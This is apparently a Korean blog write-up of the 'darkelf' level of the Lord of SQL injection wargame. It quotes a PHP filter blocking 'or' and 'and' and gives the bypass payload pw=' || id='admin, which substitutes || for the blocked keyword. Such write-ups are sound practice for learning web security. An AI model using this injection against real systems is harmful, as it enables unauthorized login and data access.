소스코드 분석
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
or, and 연산을 사용못하게 했다.
if($result['id'] == 'admin') solve("darkelf");
그리고 id=admin 이라는 조건만 맞추면 풀린다.
or은 논리 연산자로 || 사용가능 하고, and는 논리 연산자로 && 사용할수가 있다.
?pw=%27%20||%20id=%27admin
pw=' || id='admin
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] troll (0) | 2017.05.25 |
|---|---|
| [Lord of SQL injection] orge (0) | 2017.05.25 |
| [Lord of SQL injection] wolfman (0) | 2017.05.24 |
| [Lord of SQL injection] orc (0) | 2017.05.24 |
| [Lord of SQL injection] goblin (0) | 2017.05.24 |
